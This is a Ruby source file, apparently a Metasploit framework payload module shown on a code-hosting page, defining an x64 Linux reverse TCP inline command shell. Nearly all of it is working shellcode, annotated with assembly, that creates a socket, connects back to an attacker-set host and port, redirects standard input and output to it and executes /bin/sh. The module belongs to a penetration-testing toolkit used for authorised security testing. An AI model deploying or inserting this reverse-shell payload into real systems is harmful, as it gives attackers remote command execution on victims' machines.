Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
module MetasploitModule
8

9
  CachedSize = 74
10

11
  include Msf::Payload::Single
12
  include Msf::Payload::Linux
13
  include Msf::Sessions::CommandShellOptions
14

15
  def initialize(info = {})
16
    super(merge_info(info,
17
      'Name'          => 'Linux Command Shell, Reverse TCP Inline',
18
      'Description'   => 'Connect back to attacker and spawn a command shell',
19
      'Author'        => 'ricky',
20
      'License'       => MSF_LICENSE,
21
      'Platform'      => 'linux',
22
      'Arch'          => ARCH_X64,
23
      'Handler'       => Msf::Handler::ReverseTcp,
24
      'Session'       => Msf::Sessions::CommandShellUnix,
25
      'Payload'       =>
26
        {
27
          'Offsets' =>
28
            {
29
              'LHOST' => [ 20, 'ADDR' ],
30
              'LPORT' => [ 18, 'n'    ],
31
            },
32
          'Payload' =>
33
            "\x6a\x29"                     + # pushq  $0x29
34
            "\x58"                         + # pop    %rax
35
            "\x99"                         + # cltd
36
            "\x6a\x02"                     + # pushq  $0x2
37
            "\x5f"                         + # pop    %rdi
38
            "\x6a\x01"                     + # pushq  $0x1
39
            "\x5e"                         + # pop    %rsi
40
            "\x0f\x05"                     + # syscall
41
            "\x48\x97"                     + # xchg   %rax,%rdi
42
            "\x48\xb9\x02\x00"             + # movabs $0x100007fb3150002,%rcx
43
            "\x15\xb3"                     + #
44
            "\x7f\x00\x00\x01"             + #
45
            "\x51"                         + # push   %rcx
46
            "\x48\x89\xe6"                 + # mov    %rsp,%rsi
47
            "\x6a\x10"                     + # pushq  $0x10
48
            "\x5a"                         + # pop    %rdx
49
            "\x6a\x2a"                     + # pushq  $0x2a
50
            "\x58"                         + # pop    %rax
51
            "\x0f\x05"                     + # syscall
52
            "\x6a\x03"                     + # pushq  $0x3
53
            "\x5e"                         + # pop    %rsi
54
            "\x48\xff\xce"                 + # dec    %rsi
55
            "\x6a\x21"                     + # pushq  $0x21
56
            "\x58"                         + # pop    %rax
57
            "\x0f\x05"                     + # syscall
58
            "\x75\xf6"                     + # jne    27 <dup2_loop>
59
            "\x6a\x3b"                     + # pushq  $0x3b
60
            "\x58"                         + # pop    %rax
61
            "\x99"                         + # cltd
62
            "\x48\xbb\x2f\x62\x69\x6e\x2f" + # movabs $0x68732f6e69622f,%rbx
63
            "\x73\x68\x00"                 + #
64
            "\x53"                         + # push   %rbx
65
            "\x48\x89\xe7"                 + # mov    %rsp,%rdi
66
            "\x52"                         + # push   %rdx
67
            "\x57"                         + # push   %rdi
68
            "\x48\x89\xe6"                 + # mov    %rsp,%rsi
69
            "\x0f\x05"                       # syscall
70
        }
71
      ))
72
  end
73
end
74

75